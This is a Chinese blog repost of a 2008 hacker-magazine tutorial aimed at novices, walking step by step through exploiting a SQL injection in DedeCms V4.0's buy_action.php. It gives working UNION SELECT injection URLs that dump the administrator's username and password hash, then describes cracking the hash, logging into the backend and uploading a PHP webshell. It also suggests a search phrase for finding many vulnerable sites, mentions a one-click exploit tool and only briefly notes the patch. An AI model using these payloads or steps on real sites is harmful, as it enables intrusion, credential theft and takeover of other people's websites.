作者:hackest [H.S.T]
此文章已发表在《黑客X档案》2008年第4期杂志上
后经作者发布在博客上,如转载请务必保留此信息!
DedeCms即织梦内容管理系统,其最新版本已发发行到了5.0,不过这次的漏洞只针对OX V4.0版本有效。漏洞文件为buy_action.php,该文件在对pid的值传递没有做充分的过滤,导致了SQL注入漏洞的产生。去官方网站下载了最新版本的OX V4.0,本地架设环境测试。本文着重介绍漏洞的利用过程,至于漏洞的具体成因将不作详细讨论,有兴趣的朋友可自行阅读漏洞文件代码。可以通过搜索关键字“Power by DedeCms”找到大量使用这套程序的网站。
一、注册用户
本机注册地址为:http://127.0.0.1/dedecms/member/index_do.php?fmdo=user&dopost=regnew,填入相关信息,注册即可,如图1。

图1
二、爆管理员用户名
注册好了之后就登录系统,提交如下地址即可直接爆管理员的用户名:
http://127.0.0.1/dedecms/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
成功爆出了管理员的用户名(hackest),如图2。

图2
三、爆管理员密码
接下来是直接爆管理员的密码MD5值了,提交如下地址:
http://127.0.0.1/dedecms/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
成功爆出了管理员的密码MD5值(eee01c9ab7267f25),如图3。

图3
四、登录后台拿Webshell
怎么样,非常简单吧?到这里就已经可以拿着MD5值直接去查询密码明文了,这里的eee01c9ab7267f25还原成明文即是hackest。下一步就该登录后台拿Webshell了。后台登录地址为(在URL后加上dede即可自动跳转至后台登录页面):
http://127.0.0.1/dedecms/dede/login.php?gotopage=%2Fdedecms%2Fdede%2F
用户名和密码均为hackest,成功登录后台,如图4。

图4
然后打开“模板管理”页面,直接上传你的PHP马即可,如图5。

图5
直接在后台点击该文件访问即可跳转至Webshell的登录入口,输入密码进入即可,如图6。

图6
整个过程非常的简单,基本上没有什么技术含量可言。如果菜鸟们觉得手动很麻烦的话,不妨试下一个针对此漏洞的利用工具,界面如图7。

图7
怎么样,很贴心吧,从注册到登录后台的“一条龙”功能!
五、漏洞修补
官方已经给出了补丁,不过没有集成到4.0的安装程序包里面,用补丁包里的buy_action.php文件覆盖原文件即可。
转载请注明:落伍老站长 » 教菜鸟来玩DedeCms V4.0注入漏洞